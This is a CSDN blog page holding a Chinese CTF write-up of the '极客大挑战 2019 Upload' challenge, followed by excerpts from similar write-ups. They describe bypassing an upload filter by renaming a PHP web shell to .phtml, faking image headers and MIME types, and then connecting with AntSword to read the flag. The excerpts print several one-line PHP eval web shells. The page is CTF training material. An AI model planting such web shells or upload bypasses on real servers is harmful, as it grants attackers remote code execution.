[极客大挑战 2019]Upload 1

最新推荐文章于 2024-03-03 12:46:02 发布
最新推荐文章于 2024-03-03 12:46:02 发布
阅读量907 收藏
点赞数
分类专栏: CTF题目笔记 文章标签: 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69856013/article/details/127342622
版权

 观察登录页面并结合提示,可知本题为文件上传类型,第一次做这种题

首先直接写一个一句话上传木马以php结尾

 好吧用脚趾头想也不可能过去

把后缀改成phtml试试能不能绕过

 还是不行

改成jpg,可以上传成功 

用burp抓包试试直接绕过前端修改,把filename里面原来的后缀jpg改成phtml

成功上传shell

一般的话文件都会放在upload目录下,这题也不例外

 

到此处开始使用蚁剑

在虚拟终端中直接cat< /flag

 

 

1 and 1=1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
文件上传 [极客挑战 2019]Upload 1
m0_75178803的博客
10-11 953
上传失败了,应该是在后端也对我们的文件内容进行了检测,检测到我们的一句话木马里面包含
BUUFCTF—[极客挑战 2019]Upload 1
good good study
05-12 1079
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
BUUCTF---[极客挑战 2019]Upload1
最新发布
2201_75556700的博客
03-03 583
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
BUUCTF——[极客挑战 2019]Upload 1
qq_53175607的博客
12-04 2661
1.打开后发现是文件上传 构建一句话木马 <?php @eval($_POST['shy']);?> 将一句话木马改成jpg文件尝试上传。 抓包改成php 提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头 2.然后和一步骤一样上传 ...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战目练习
05-05
【ISCC2019个人挑战目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
BUUCTF Web [极客挑战 2019]Upload & [ACTF2020 新生赛]Upload
网安小趴菜
08-31 576
BUUCTF Web [极客挑战 2019]Upload 和[ACTF2020 新生赛]Upload
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1879
目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
第十届极客挑战——复现未解决的web和RE
A_dmin的博客
12-06 1181
第十届极客挑战——复现未解决的web和RE 第十届极客挑战——复现未解决的web和RE web - 性感黄阿姨,在线聊天 web - Eval evil code web - 服务端检测系统 web - 你有特洛伊么 web - 你读懂潇文清的网站了吗 RE - 阅兵你认真看了嘛? RE - python1
[极客挑战 2019]PHP
热门推荐
沐目的博客
12-14 1万+
这道不怎么难,但还是学到了一些东西。记录一下。 1.public、protected与private在序列化时的区别 protected 声明的字段为保护字段,在所声明的类和该类的子类可见,但在该类的对象实例不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。这也许解释了,为什么如果直接...
BUUCTF:[极客挑战 2019]Upload
末初的CSDN博客
11-04 313
目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload POST /upload_file.php HTTP/1.1 Host: b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/.
buuctf-[极客挑战 2019]Upload1
m0_62094846的博客
12-07 246
上传php,jpg,png,gif都报错 然后看wp GIF89a? <script language="php">eval($_REQUEST[feng])</script> 用这一串GIF89a伪造gif文件就行 真的上传不了假的上传成功了,就满脸问号 把后缀名改成phtml 因为没告诉文件上传后的位置,就要猜测,做这么多,一般都是在upload里面 upload+文件名 ...
web buuctf [极客挑战 2019]Upload1
weixin_44214568的博客
09-04 563
1.随便上传一个东西,我上传的是一个txt文档,提示 "not image"; 2.不是图片格式,那就抓包改消息头 改为 : 上传后提示“don't lie to me,it's not image at all!" 应该是存在过滤,试试其他的格式: 改成php,提示“not php!” 改成php3,提示"not php3!" 之后又试了一下php4,也是不行, 最后试了一下phtml,提示“don't lie to me,it's not image at all!" 这样发现
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值